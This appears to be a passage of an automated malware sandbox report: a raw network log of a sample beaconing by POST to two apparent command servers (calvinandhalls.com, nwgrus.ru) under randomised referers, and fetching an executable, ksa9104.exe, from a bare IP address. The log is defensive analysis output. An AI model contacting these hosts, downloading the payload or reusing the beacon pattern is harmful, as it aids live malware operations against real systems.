Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://ofhxxqwynqyymdr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 320Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://sahqobiyulqik.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 328Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://ccbxpmvivyv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 356Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://wxjecgujyrvwrcxv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 152Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://etbvtxkiimobbb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 137Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://xidhlcltwnrqmpms.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 153Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://iqpmunwonthwxj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 276Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://xujwwosldbarb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 182Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://vntsetisbky.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 295Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://calvinandhalls.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 4431Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://osmeijnmqbad.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://esjrsvtmrom.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: https://yfclovtrctueuif.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: calvinandhalls.com
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://yvmmviecnxldpero.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 271Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fmehaoiwwenqht.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 169Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pmvrpbcqomr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ehjasruwjmcyiyc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 188Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mabsoalepkufuc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 123Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://wlihjqaglis.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 322Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://djgtchksmne.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 133Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jrsqrkoonpvkf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 160Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pqllteniaumhpux.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 159Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ksbeipjuadnqvhne.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 344Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ikkkpskbtojtajm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 209Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://tlcaywkjpltapmg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 118Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ljdtqpdqnfgadl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 112Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fmsbxuxqcel.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 116Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://sjpwecfehtwlg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 145Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vvymdudugxqyqgd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 171Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vctlwttuihixctye.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 269Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qkabdlcselvepu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 279Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fboiokwqifnpfwwg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 164Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://cjlnjwyjoxyuf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 174Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://jvksadufkdlihaeq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 275Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ricjpvrheenoi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 119Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://uobogpxbvskdl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 261Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vwmsjsqvwuhba.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 331Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://kskrxgkqoed.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 190Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://euceyfvfmeh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 169Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qptrydkvolka.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 125Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://kaqmpmaijfnk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 293Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gyvqqphlebcxdpkv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 351Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ljhchdbaaaxer.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 332Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gjsnmktycknrotm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 245Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gtnnfkxyrnmdua.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 312Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gjxqibcjarykr.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 133Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://lwriihoulvmts.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 173Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://nfjjiuyrybf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 302Host: nwgrus.ru
Source: global traffic	HTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xtbardaliciv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 341Host: nwgrus.ru

Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164
Source: unknown	TCP traffic detected without corresponding DNS query: 23.145.40.164

Source: global traffic

HTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164

Source: global traffic	DNS traffic detected: DNS query: nwgrus.ru
Source: global traffic	DNS traffic detected: DNS query: calvinandhalls.com

Source: unknown

HTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://xijgwgdevjmtswh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 249Host: calvinandhalls.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 10:28:42 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Type: text/html; charset=utf-8Connection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 10:28:55 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Type: text/html; charset=utf-8Connection: closeTransfer-Encoding: chunked
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 10:28:57 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 409Content-Type: text/html; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 10:29:03 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 409Content-Type: text/html; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 10:30:15 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 10:30:32 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 03 Oct 2024 10:30:49 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:27:26 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 86 ea Data Ascii: r
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:27:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:27:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 10:27:35 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
